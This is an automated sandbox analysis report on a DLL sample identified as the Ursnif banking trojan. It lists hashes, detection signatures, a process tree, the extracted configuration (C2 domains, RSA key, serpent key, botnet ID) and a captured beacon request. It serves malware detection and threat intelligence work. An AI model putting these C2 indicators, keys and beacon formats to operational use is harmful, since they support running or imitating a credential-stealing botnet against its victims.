Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 616412739e268.dll

Overview

General Information

Sample Name:616412739e268.dll
Analysis ID:500413
MD5:9e67e68ddbedba865b91b5469ab642ef
SHA1:f2c7b0735343081be06e48616d0fc14235a28744
SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
Tags:brtdllgoziisfbursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7088 cmdline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 5724 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4432 cmdline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6084 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6012 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4360 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 29 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.loaddll32.exe.2d494a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              10.3.rundll32.exe.10ba31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                5.3.rundll32.exe.10da31a.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  6.3.rundll32.exe.318a31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    6.2.rundll32.exe.6e8d0000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 616412739e268.dllReversingLabs: Detection: 24%
                      Source: 616412739e268.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49759 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49783 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49816 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49821 version: TLS 1.2
                      Source: 616412739e268.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb7 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb.{Y@e source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbf{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbl{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb/ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000012.00000002.529162256.0000000002F92000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.551332599.0000000000632000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: winspool.pdb6{1@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb0{?@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb({G@r source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb0 source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000016.00000003.516470114.0000000004CA2000.00000004.00000001.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbn source: WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbQ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbA source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb<{K@a source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb9 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb[ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000002.00000002.682655563.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.683978405.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.548616295.000000006E94B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: msctf.pdb# source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb% source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000018.00000003.521770649.000000000090B000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: msctf.pdb"{M@C source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.98.207.210 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.60.226 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewIP Address: 40.97.161.50 40.97.161.50
                      Source: Joe Sandbox ViewIP Address: 13.82.28.61 13.82.28.61
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
